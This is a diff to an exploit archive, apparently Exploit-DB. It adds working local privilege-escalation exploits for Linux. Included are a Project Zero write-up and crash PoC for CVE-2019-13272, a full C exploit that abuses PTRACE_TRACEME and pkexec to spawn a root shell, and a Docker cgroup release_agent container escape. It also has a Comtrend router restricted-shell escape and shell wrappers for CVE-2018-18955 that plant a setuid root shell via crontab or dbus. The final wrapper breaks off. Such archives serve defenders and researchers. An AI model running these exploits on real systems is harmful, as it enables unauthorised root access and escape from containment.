+put_cred_rcu() will already have been scheduled. The kernel usually manages to
+panic() before memory corruption occurs here using the following code in
+put_cred_rcu(); however, I think memory corruption would also be possible if
+this code races exactly the right way.
+
+        if (atomic_read(&cred->usage) != 0)
+                panic("CRED: put_cred_rcu() sees %p with usage %d\n",
+                      cred, atomic_read(&cred->usage));
+
+A simple PoC to trigger this bug:
+============================
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <signal.h>
+#include <sched.h>
+#include <err.h>
+#include <sys/prctl.h>
+#include <sys/types.h>
+#include <sys/ptrace.h>
+
+int grandchild_fn(void *dummy) {
+  if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))
+    err(1, "traceme");
+  return 0;
+}
+
+int main(void) {
+  pid_t child = fork();
+  if (child == -1) err(1, "fork");
+
+  /* child */
+  if (child == 0) {
+    static char child_stack[0x100000];
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+    while (1) {
+      if (clone(grandchild_fn, child_stack+sizeof(child_stack), CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_PARENT|CLONE_VM|CLONE_SIGHAND|CLONE_SYSVSEM|CLONE_VFORK, NULL) == -1)
+        err(1, "clone failed");
+    }
+  }
+
+  /* parent */
+  uid_t uid = getuid();
+  while (1) {
+    if (setresuid(uid, uid, uid)) err(1, "setresuid");
+  }
+}
+============================
+
+Result:
+============================
+[  484.576983] ------------[ cut here ]------------
+[  484.580565] kernel BUG at kernel/cred.c:138!
+[  484.585278] Kernel panic - not syncing: CRED: put_cred_rcu() sees 000000009e024125 with usage 1
+[  484.589063] CPU: 1 PID: 1908 Comm: panic Not tainted 5.2.0-rc7 #431
+[  484.592410] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
+[  484.595843] Call Trace:
+[  484.598688]  <IRQ>
+[  484.601451]  dump_stack+0x7c/0xbb
+[...]
+[  484.607349]  panic+0x188/0x39a
+[...]
+[  484.622650]  put_cred_rcu+0x112/0x120
+[...]
+[  484.628580]  rcu_core+0x664/0x1260
+[...]
+[  484.646675]  __do_softirq+0x11d/0x5dd
+[  484.649523]  irq_exit+0xe3/0xf0
+[  484.652374]  smp_apic_timer_interrupt+0x103/0x320
+[  484.655293]  apic_timer_interrupt+0xf/0x20
+[  484.658187]  </IRQ>
+[  484.660928] RIP: 0010:do_error_trap+0x8d/0x110
+[  484.664114] Code: da 4c 89 ee bf 08 00 00 00 e8 df a5 09 00 3d 01 80 00 00 74 54 48 8d bb 90 00 00 00 e8 cc 8e 29 00 f6 83 91 00 00 00 02 75 2b <4c> 89 7c 24 40 44 8b 4c 24 04 48 83 c4 08 4d 89 f0 48 89 d9 4c 89
+[  484.669035] RSP: 0018:ffff8881ddf2fd58 EFLAGS: 00000246 ORIG_RAX: ffffffffffffff13
+[  484.672784] RAX: 0000000000000000 RBX: ffff8881ddf2fdb8 RCX: ffffffff811144dd
+[  484.676450] RDX: 0000000000000007 RSI: dffffc0000000000 RDI: ffff8881eabc4bf4
+[  484.680306] RBP: 0000000000000006 R08: fffffbfff0627a02 R09: 0000000000000000
+[  484.684033] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000004
+[  484.687697] R13: ffffffff82618dc0 R14: 0000000000000000 R15: ffffffff810c99d5
+[...]
+[  484.700626]  do_invalid_op+0x31/0x40
+[...]
+[  484.707183]  invalid_op+0x14/0x20
+[  484.710499] RIP: 0010:__put_cred+0x65/0x70
+[  484.713598] Code: 48 8d bd 90 06 00 00 e8 49 e2 1f 00 48 3b 9d 90 06 00 00 74 19 48 8d bb 90 00 00 00 48 c7 c6 50 98 0c 81 5b 5d e9 ab 1f 08 00 <0f> 0b 0f 0b 0f 0b 0f 1f 44 00 00 55 53 48 89 fb 48 81 c7 90 06 00
+[  484.718633] RSP: 0018:ffff8881ddf2fe68 EFLAGS: 00010202
+[  484.722407] RAX: 0000000000000001 RBX: ffff8881f38a4600 RCX: ffffffff810c9987
+[  484.726147] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8881f38a4600
+[  484.730049] RBP: ffff8881f38a4600 R08: ffffed103e7148c1 R09: ffffed103e7148c1
+[  484.733857] R10: 0000000000000001 R11: ffffed103e7148c0 R12: ffff8881eabc4380
+[  484.737923] R13: 00000000000003e8 R14: ffff8881f1a5b000 R15: ffff8881f38a4778
+[...]
+[  484.748760]  commit_creds+0x41c/0x520
+[...]
+[  484.756115]  __sys_setresuid+0x1cb/0x1f0
+[  484.759634]  do_syscall_64+0x5d/0x260
+[  484.763024]  entry_SYSCALL_64_after_hwframe+0x49/0xbe
+[  484.766441] RIP: 0033:0x7fcab9bb4845
+[  484.769839] Code: 0f 1f 44 00 00 48 83 ec 38 64 48 8b 04 25 28 00 00 00 48 89 44 24 28 31 c0 8b 05 a6 8e 0f 00 85 c0 75 2a b8 75 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 53 48 8b 4c 24 28 64 48 33 0c 25 28 00 00 00
+[  484.775183] RSP: 002b:00007ffe01137aa0 EFLAGS: 00000246 ORIG_RAX: 0000000000000075
+[  484.779226] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcab9bb4845
+[  484.783057] RDX: 00000000000003e8 RSI: 00000000000003e8 RDI: 00000000000003e8
+[  484.787101] RBP: 00007ffe01137af0 R08: 0000000000000000 R09: 00007fcab9caf500
+[  484.791045] R10: fffffffffffff4d4 R11: 0000000000000246 R12: 00005573b2f240b0
+[  484.794891] R13: 00007ffe01137bd0 R14: 0000000000000000 R15: 0000000000000000
+[  484.799171] Kernel Offset: disabled
+[  484.802932] ---[ end Kernel panic - not syncing: CRED: put_cred_rcu() sees 000000009e024125 with usage 1 ]---
+============================
+
+
+The second problem is that, because the PTRACE_TRACEME case grabs the
+credentials of a potentially unaware tracer, it can be possible for a normal
+user to create and use a ptrace relationship that is marked as privileged even
+though no privileged code ever requested or used that ptrace relationship.
+This requires the presence of a setuid binary with certain behavior: It has to
+drop privileges and then become dumpable again (via prctl() or execve()).
+
+ - task A: fork()s a child, task B
+ - task B: fork()s a child, task C
+ - task B: execve(/some/special/suid/binary)
+ - task C: PTRACE_TRACEME (creates privileged ptrace relationship)
+ - task C: execve(/usr/bin/passwd)
+ - task B: drop privileges (setresuid(getuid(), getuid(), getuid()))
+ - task B: become dumpable again (e.g. execve(/some/other/binary))
+ - task A: PTRACE_ATTACH to task B
+ - task A: use ptrace to take control of task B
+ - task B: use ptrace to take control of task C
+
+Polkit's pkexec helper fits this pattern. On a typical desktop system, any
+process running under an active local session can invoke some helpers through
+pkexec (see configuration in /usr/share/polkit-1/actions, search for <action>s
+that specify <allow_active>yes</allow_active> and
+<annotate key="org.freedesktop.policykit.exec.path">...</annotate>).
+While pkexec is normally used to run programs as root, pkexec actually allows
+its caller to specify the user to run a command as with --user, which permits
+using pkexec to run a command as the user who executed pkexec. (Which is kinda
+weird... why would I want to run pkexec helpers as more than one fixed user?)
+
+I have attached a proof-of-concept that works on Debian 10 running a distro
+kernel and the XFCE desktop environment; if you use a different desktop
+environment, you may have to add a path to the `helpers` array in the PoC. When
+you compile and run it in an active local session, you should get a root shell
+within a second.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
\ No newline at end of file
diff --git a/exploits/linux/local/47147.txt b/exploits/linux/local/47147.txt
new file mode 100644
index 000000000..431708fab
--- /dev/null
+++ b/exploits/linux/local/47147.txt
@@ -0,0 +1,15 @@
+# On the host
+docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
+
+# In the container
+mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
+
+echo 1 > /tmp/cgrp/x/notify_on_release
+host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
+echo "$host_path/cmd" > /tmp/cgrp/release_agent
+
+echo '#!/bin/sh' > /cmd
+echo "ps aux > $host_path/output" >> /cmd
+chmod a+x /cmd
+
+sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
\ No newline at end of file
diff --git a/exploits/linux/local/47149.txt b/exploits/linux/local/47149.txt
new file mode 100644
index 000000000..55b4e6888
--- /dev/null
+++ b/exploits/linux/local/47149.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Comtrend-AR-5310 - Restricted Shell Escape
+# Date: 2019-07-20
+# Exploit Author: AMRI Amine
+# Vendor Homepage: https://www.comtrend.com/
+# Version: GE31-412SSG-C01_R10.A2pG039u.d24k
+# Tested on: Linux (busybox)
+
+TL;DR: A local user can bypass the restricted shell using the command substitution operator $( commmand )
+
+Comtrend AR 5310 routers have a restricted shell, the list of command a user can execute is
+
+[ ? help logout exit quit reboot ads lxdslctl xtm loglevel logdest virtualserver ddns dumpcfg dumpmdm meminfo psp dumpsysinfo dnsproxy syslog ifconfig ping sntp sysinfo tftp wlan wlctl vlanctl arp defaultgateway dhcpserver dns lan lanhosts passwd ppp restoredefault route nslookup traceroute save uptime exitOnIdle wan build version serialnumber modelname acccntr upnp urlfilter timeres tr69cfg logouttime ipneigh dhcp6sinfo nat mcpctl ]
+
+Usual terminal constructs like:
+
+    the command separator ";"
+    the control operator "&" (run in forground)
+    the redirection operator (pipe) "|"
+    the command substitution operator "`"
+
+are all filtered as shown here :
+
+ > ;
+Warning: operator ; is not supported!
+telnetd:error:476.449:processInput:490:unrecognized command 
+ > |
+Warning: operator | is not supported!
+telnetd:error:484.871:processInput:490:unrecognized command 
+ > &
+Warning: operator & is not supported!
+telnetd:error:487.421:processInput:490:unrecognized command 
+ > `
+Warning: operator ` is not supported!
+telnetd:error:495.334:processInput:490:unrecognized command 
+
+Still the $ operator is not filtered:
+
+ > $
+telnetd:error:497.862:processInput:490:unrecognized command $
+
+Here i came to the conclusion that invoking a command with $( subcommand ) as argument would give an obvious shell
+
+> ping $( sh )                                                              
+exec >&2                                                                     
+ps x | grep telnet                                                           
+18333 root      4164 S    telnetd -m 0                                       
+18334 root      4168 S    telnetd -m 0                                       
+
+EOF
\ No newline at end of file
diff --git a/exploits/linux/local/47163.c b/exploits/linux/local/47163.c
new file mode 100644
index 000000000..01af8107b
--- /dev/null
+++ b/exploits/linux/local/47163.c
@@ -0,0 +1,443 @@
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+// Uses pkexec technique
+// ---
+// Original discovery and exploit author: Jann Horn
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
+// ---
+// <bcoles@gmail.com>
+// - added known helper paths
+// - added search for suitable helpers
+// - added automatic targeting
+// - changed target suid exectuable from passwd to pkexec
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
+// ---
+// Tested on:
+// - Ubuntu 16.04.5 kernel 4.15.0-29-generic
+// - Ubuntu 18.04.1 kernel 4.15.0-20-generic
+// - Ubuntu 19.04 kernel 5.0.0-15-generic
+// - Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
+// - Linux Mint 19 kernel 4.15.0-20-generic
+// - Xubuntu 16.04.4 kernel 4.13.0-36-generic
+// - ElementaryOS 0.4.1 4.8.0-52-generic
+// - Backbox 6 kernel 4.18.0-21-generic
+// - Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
+// - Kali kernel 4.19.0-kali5-amd64
+// - Redcore 1806 (LXQT) kernel 4.16.16-redcore
+// - MX 18.3 kernel 4.19.37-2~mx17+1
+// - RHEL 8.0 kernel 4.18.0-80.el8.x86_64
+// - Debian 9.4.0 kernel 4.9.0-6-amd64
+// - Debian 10.0.0 kernel 4.19.0-5-amd64
+// - Devuan 2.0.0 kernel 4.9.0-6-amd64
+// - SparkyLinux 5.8 kernel 4.19.0-5-amd64
+// - Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
+// - Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
+// - Mageia 6 kernel 4.9.35-desktop-1.mga6
+// - Antergos 18.7 kernel 4.17.6-1-ARCH
+// ---
+// user@linux-mint-19-2:~$ gcc -s poc.c -o ptrace_traceme_root
+// user@linux-mint-19-2:~$ ./ptrace_traceme_root
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+// [.] Checking environment ...
+// [~] Done, looks good
+// [.] Searching for known helpers ...
+// [~] Found known helper: /usr/sbin/mate-power-backlight-helper
+// [.] Using helper: /usr/sbin/mate-power-backlight-helper
+// [.] Spawning suid process (/usr/bin/pkexec) ...
+// [.] Tracing midpid ...
+// [~] Attached to midpid
+// To run a command as administrator (user "root"), use "sudo <command>".
+// See "man sudo_root" for details.
+//
+// root@linux-mint-19-2:/home/user#
+// ---
+
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <stddef.h>
+#include <stdarg.h>
+#include <pwd.h>
+#include <sys/prctl.h>
+#include <sys/wait.h>
+#include <sys/ptrace.h>
+#include <sys/user.h>
+#include <sys/syscall.h>
+#include <sys/stat.h>
+#include <linux/elf.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define SAFE(expr) ({                   \
+  typeof(expr) __res = (expr);          \
+  if (__res == -1) {                    \
+    dprintf("[-] Error: %s\n", #expr);  \
+    return 0;                           \
+  }                                     \
+  __res;                                \
+})
+#define max(a,b) ((a)>(b) ? (a) : (b))
+
+static const char *SHELL = "/bin/bash";
+
+static int middle_success = 1;
+static int block_pipe[2];
+static int self_fd = -1;
+static int dummy_status;
+static const char *helper_path;
+static const char *pkexec_path = "/usr/bin/pkexec";
+static const char *pkaction_path = "/usr/bin/pkaction";
+struct stat st;
+
+const char *helpers[1024];
+
+const char *known_helpers[] = {
+  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
+  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
+  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
+  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
+  "/usr/sbin/mate-power-backlight-helper",
+  "/usr/bin/xfpm-power-backlight-helper",
+  "/usr/bin/lxqt-backlight_backend",
+  "/usr/libexec/gsd-wacom-led-helper",
+  "/usr/libexec/gsd-wacom-oled-helper",
+  "/usr/libexec/gsd-backlight-helper",
+  "/usr/lib/gsd-backlight-helper",
+  "/usr/lib/gsd-wacom-led-helper",
+  "/usr/lib/gsd-wacom-oled-helper",
+};
+
+/* temporary printf; returned pointer is valid until next tprintf */
+static char *tprintf(char *fmt, ...) {
+  static char buf[10000];
+  va_list ap;
+  va_start(ap, fmt);
+  vsprintf(buf, fmt, ap);
+  va_end(ap);
+  return buf;
+}
+
+/*
+ * fork, execute pkexec in parent, force parent to trace our child process,
+ * execute suid executable (pkexec) in child.
+ */
+static int middle_main(void *dummy) {
+  prctl(PR_SET_PDEATHSIG, SIGKILL);
+  pid_t middle = getpid();
+
+  self_fd = SAFE(open("/proc/self/exe", O_RDONLY));
+
+  pid_t child = SAFE(fork());
+  if (child == 0) {
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+
+    SAFE(dup2(self_fd, 42));
+
+    /* spin until our parent becomes privileged (have to be fast here) */
+    int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY));
+    char *needle = tprintf("\nUid:\t%d\t0\t", getuid());
+    while (1) {
+      char buf[1000];
+      ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));
+      buf[buflen] = '\0';
+      if (strstr(buf, needle)) break;
+    }
+
+    /*
+     * this is where the bug is triggered.
+     * while our parent is in the middle of pkexec, we force it to become our
+     * tracer, with pkexec's creds as ptracer_cred.
+     */
+    SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
+
+    /*
+     * now we execute a suid executable (pkexec).
+     * Because the ptrace relationship is considered to be privileged,
+     * this is a proper suid execution despite the attached tracer,
+     * not a degraded one.
+     * at the end of execve(), this process receives a SIGTRAP from ptrace.
+     */
+    execl(pkexec_path, basename(pkexec_path), NULL);
+
+    dprintf("[-] execl: Executing suid executable failed");
+    exit(EXIT_FAILURE);
+  }
+
+  SAFE(dup2(self_fd, 0));
+  SAFE(dup2(block_pipe[1], 1));
+
+  /* execute pkexec as current user */
+  struct passwd *pw = getpwuid(getuid());
+  if (pw == NULL) {
+    dprintf("[-] getpwuid: Failed to retrieve username");
+    exit(EXIT_FAILURE);
+  }
+
+  middle_success = 1;
+  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
+        helper_path,
+        "--help", NULL);
+  middle_success = 0;
+  dprintf("[-] execl: Executing pkexec failed");
+  exit(EXIT_FAILURE);
+}
+
+/* ptrace pid and wait for signal */
+static int force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {
+  struct user_regs_struct regs;
+  struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
+  SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+  SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));
+
+  /* set up indirect arguments */
+  unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
+  struct injected_page {
+    unsigned long argv[2];
+    unsigned long envv[1];
+    char arg0[8];
+    char path[1];
+  } ipage = {
+    .argv = { scratch_area + offsetof(struct injected_page, arg0) }
+  };
+  strcpy(ipage.arg0, arg0);
+  for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
+    unsigned long pdata = ((unsigned long *)&ipage)[i];
+    SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),
+                (void*)pdata));
+  }
+
+  /* execveat(exec_fd, path, argv, envv, flags) */
+  regs.orig_rax = __NR_execveat;
+  regs.rdi = exec_fd;
+  regs.rsi = scratch_area + offsetof(struct injected_page, path);
+  regs.rdx = scratch_area + offsetof(struct injected_page, argv);
+  regs.r10 = scratch_area + offsetof(struct injected_page, envv);
+  regs.r8 = AT_EMPTY_PATH;
+
+  SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));
+  SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+}
+
+static int middle_stage2(void) {
+  /* our child is hanging in signal delivery from execve()'s SIGTRAP */
+  pid_t child = SAFE(waitpid(-1, &dummy_status, 0));
+  force_exec_and_wait(child, 42, "stage3");
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * root shell * * * * * * * * * * * * * * * * *
+
+static int spawn_shell(void) {
+  SAFE(setresgid(0, 0, 0));
+  SAFE(setresuid(0, 0, 0));
+  execlp(SHELL, basename(SHELL), NULL);
+  dprintf("[-] execlp: Executing shell %s failed", SHELL);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * *
+
+static int check_env(void) {
+  const char* xdg_session = getenv("XDG_SESSION_ID");
+
+  dprintf("[.] Checking environment ...\n");
+
+  if (stat(pkexec_path, &st) != 0) {
+    dprintf("[-] Could not find pkexec executable at %s", pkexec_path);
+    exit(EXIT_FAILURE);
+  }
+  if (stat(pkaction_path, &st) != 0) {
+    dprintf("[-] Could not find pkaction executable at %s", pkaction_path);
+    exit(EXIT_FAILURE);
+  }
+  if (xdg_session == NULL) {
+    dprintf("[!] Warning: $XDG_SESSION_ID is not set\n");
+    return 1;
+  }
+  if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
+    dprintf("[!] Warning: Could not find active PolKit agent\n");
+    return 1;
+  }
+  if (stat("/usr/sbin/getsebool", &st) == 0) {
+    if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) {
+      dprintf("[!] Warning: SELinux deny_ptrace is enabled\n");
+      return 1;
+    }
+  }
+
+  dprintf("[~] Done, looks good\n");
+
+  return 0;
+}
+
+/*
+ * Use pkaction to search PolKit policy actions for viable helper executables.
+ * Check each action for allow_active=yes, extract the associated helper path,
+ * and check the helper path exists.
+ */
+int find_helpers() {
+  char cmd[1024];
+  snprintf(cmd, sizeof(cmd), "%s --verbose", pkaction_path);
+  FILE *fp;
+  fp = popen(cmd, "r");
+  if (fp == NULL) {
+    dprintf("[-] Failed to run: %s\n", cmd);
+    exit(EXIT_FAILURE);
+  }
+
+  char line[1024];
+  char buffer[2048];
+  int helper_index = 0;
+  int useful_action = 0;
+  static const char *needle = "org.freedesktop.policykit.exec.path -> ";
+  int needle_length = strlen(needle);
+
+  while (fgets(line, sizeof(line)-1, fp) != NULL) {
+    /* check the action uses allow_active=yes*/
+    if (strstr(line, "implicit active:")) {
+      if (strstr(line, "yes")) {
+        useful_action = 1;
+      }
+      continue;
+    }
+
+    if (useful_action == 0)
+      continue;
+    useful_action = 0;
+
+    /* extract the helper path */
+    int length = strlen(line);
+    char* found = memmem(&line[0], length, needle, needle_length);
+    if (found == NULL)
+      continue;
+
+    memset(buffer, 0, sizeof(buffer));
+    for (int i = 0; found[needle_length + i] != '\n'; i++) {
+      if (i >= sizeof(buffer)-1)
+        continue;
+      buffer[i] = found[needle_length + i];
+    }
+
+    if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
+      strstr(&buffer[0], "/cpugovctl") != 0 ||
+      strstr(&buffer[0], "/package-system-locked") != 0 ||
+      strstr(&buffer[0], "/cddistupgrader") != 0) {
+      dprintf("[.] Ignoring blacklisted helper: %s\n", &buffer[0]);
+      continue;
+    }
+
+    /* check the path exists */
+    if (stat(&buffer[0], &st) != 0)
+      continue;
+
+    helpers[helper_index] = strndup(&buffer[0], strlen(buffer));
+    helper_index++;
+
+    if (helper_index >= sizeof(helpers)/sizeof(helpers[0]))
+      break;
+  }
+
+  pclose(fp);
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
+
+int ptrace_traceme_root() {
+  dprintf("[.] Using helper: %s\n", helper_path);
+
+  /*
+   * set up a pipe such that the next write to it will block: packet mode,
+   * limited to one packet
+   */
+  SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));
+  SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));
+  char dummy = 0;
+  SAFE(write(block_pipe[1], &dummy, 1));
+
+  /* spawn pkexec in a child, and continue here once our child is in execve() */
+  dprintf("[.] Spawning suid process (%s) ...\n", pkexec_path);
+  static char middle_stack[1024*1024];
+  pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),
+                            CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
+  if (!middle_success) return 1;
+
+  /*
+   * wait for our child to go through both execve() calls (first pkexec, then
+   * the executable permitted by polkit policy).
+   */
+  while (1) {
+    int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY);
+    char buf[16];
+    int buflen = SAFE(read(fd, buf, sizeof(buf)-1));
+    buf[buflen] = '\0';
+    *strchrnul(buf, '\n') = '\0';
+    if (strncmp(buf, basename(helper_path), 15) == 0)
+      break;
+    usleep(100000);
+  }
+
+  /*
+   * our child should have gone through both the privileged execve() and the
+   * following execve() here
+   */
+  dprintf("[.] Tracing midpid ...\n");
+  SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
+  SAFE(waitpid(midpid, &dummy_status, 0));
+  dprintf("[~] Attached to midpid\n");
+
+  force_exec_and_wait(midpid, 0, "stage2");
+  exit(EXIT_SUCCESS);
+}
+
+int main(int argc, char **argv) {
+  if (strcmp(argv[0], "stage2") == 0)
+    return middle_stage2();
+  if (strcmp(argv[0], "stage3") == 0)
+    return spawn_shell();
+
+  dprintf("Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n");
+
+  check_env();
+
+  if (argc > 1 && strcmp(argv[1], "check") == 0) {
+    exit(0);
+  }
+
+  /* Search for known helpers defined in 'known_helpers' array */
+  dprintf("[.] Searching for known helpers ...\n");
+  for (int i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {
+    if (stat(known_helpers[i], &st) == 0) {
+      helper_path = known_helpers[i];
+      dprintf("[~] Found known helper: %s\n", helper_path);
+      ptrace_traceme_root();
+    }
+  }
+
+  /* Search polkit policies for helper executables */
+  dprintf("[.] Searching for useful helpers ...\n");
+  find_helpers();
+  for (int i=0; i<sizeof(helpers)/sizeof(helpers[0]); i++) {
+    if (helpers[i] == NULL)
+      break;
+
+    if (stat(helpers[i], &st) == 0) {
+      helper_path = helpers[i];
+      ptrace_traceme_root();
+    }
+  }
+
+  return 0;
+}
\ No newline at end of file
diff --git a/exploits/linux/local/47164.sh b/exploits/linux/local/47164.sh
new file mode 100755
index 000000000..299c4d04a
--- /dev/null
+++ b/exploits/linux/local/47164.sh
@@ -0,0 +1,103 @@
+#!/bin/sh
+#
+# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47164.zip
+#
+# wrapper for Jann Horn's exploit for CVE-2018-18955
+# uses crontab technique
+# ---
+# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.cron.sh
+# [*] Compiling...
+# [*] Writing payload to /tmp/payload...
+# [*] Adding cron job... (wait a minute)
+# [.] starting
+# [.] setting up namespace
+# [~] done, namespace sandbox set up
+# [.] mapping subordinate ids
+# [.] subuid: 165536
+# [.] subgid: 165536
+# [~] done, mapped subordinate ids
+# [.] executing subshell
+# [+] Success:
+# -rwsrwxr-x 1 root root 8384 Nov 21 19:47 /tmp/sh
+# [*] Cleaning up...
+# [!] Remember to clean up /etc/crontab
+# [*] Launching root shell: /tmp/sh
+# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id
+# uid=0(root) gid=0(root) groups=0(root),1001(test)
+
+rootshell="/tmp/sh"
+bootstrap="/tmp/payload"
+
+command_exists() {
+  command -v "${1}" >/dev/null 2>/dev/null
+}
+
+if ! command_exists gcc; then
+  echo '[-] gcc is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newuidmap; then
+  echo '[-] newuidmap is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newgidmap; then
+  echo '[-] newgidmap is not installed'
+  exit 1
+fi
+
+if ! test -w .; then
+  echo '[-] working directory is not writable'
+  exit 1
+fi
+
+echo "[*] Compiling..."
+
+if ! gcc subuid_shell.c -o subuid_shell; then
+  echo 'Compiling subuid_shell.c failed'
+  exit 1
+fi
+
+if ! gcc subshell.c -o subshell; then
+  echo 'Compiling gcc_subshell.c failed'
+  exit 1
+fi
+
+if ! gcc rootshell.c -o "${rootshell}"; then
+  echo 'Compiling rootshell.c failed'
+  exit 1
+fi
+
+echo "[*] Writing payload to ${bootstrap}..."
+
+echo "#!/bin/sh\n/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" > $bootstrap
+/bin/chmod +x "${bootstrap}"
+
+echo "[*] Adding cron job... (wait a minute)"
+
+echo "echo '* * * * * root ${bootstrap}' >> /etc/crontab" | ./subuid_shell ./subshell
+sleep 60
+
+if ! test -u "${rootshell}"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  /bin/rm "${bootstrap}"
+  exit 1
+fi
+
+echo '[+] Success:'
+ls -la "${rootshell}"
+
+echo '[*] Cleaning up...'
+/bin/rm "${bootstrap}"
+/bin/rm subuid_shell
+/bin/rm subshell
+if command_exists /bin/sed; then
+  echo "/bin/sed -i '\$ d' /etc/crontab" | $rootshell
+else
+  echo "[!] Manual clean up of /etc/crontab required"
+fi
+
+echo "[*] Launching root shell: ${rootshell}"
+$rootshell
\ No newline at end of file
diff --git a/exploits/linux/local/47165.sh b/exploits/linux/local/47165.sh
new file mode 100755
index 000000000..be68a4780
--- /dev/null
+++ b/exploits/linux/local/47165.sh
@@ -0,0 +1,148 @@
+#!/bin/sh
+#
+# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47165.zip
+#
+# wrapper for Jann Horn's exploit for CVE-2018-18955
+# uses dbus service technique
+# ---
+# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.dbus.sh
+# [*] Compiling...
+# [*] Creating /usr/share/dbus-1/system-services/org.subuid.Service.service...
+# [.] starting
+# [.] setting up namespace
+# [~] done, namespace sandbox set up
+# [.] mapping subordinate ids
+# [.] subuid: 165536
+# [.] subgid: 165536
+# [~] done, mapped subordinate ids
+# [.] executing subshell
+# [*] Creating /etc/dbus-1/system.d/org.subuid.Service.conf...
+# [.] starting
+# [.] setting up namespace
+# [~] done, namespace sandbox set up
+# [.] mapping subordinate ids
+# [.] subuid: 165536
+# [.] subgid: 165536
+# [~] done, mapped subordinate ids
+# [.] executing subshell
+# [*] Launching dbus service...
+# Error org.freedesktop.DBus.Error.NoReply: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.
+# [+] Success:
+# -rwsrwxr-x 1 root root 8384 Jan  4 18:31 /tmp/sh
+# [*] Cleaning up...
+# [*] Launching root shell: /tmp/sh
+# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id
+# uid=0(root) gid=0(root) groups=0(root),1001(test)
+
+rootshell="/tmp/sh"
+service="org.subuid.Service"
+
+command_exists() {
+  command -v "${1}" >/dev/null 2>/dev/null
+}
+
+if ! command_exists gcc; then
+  echo '[-] gcc is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/dbus-send; then
+  echo '[-] dbus-send is not installed'
+  exit 1
+fi
+
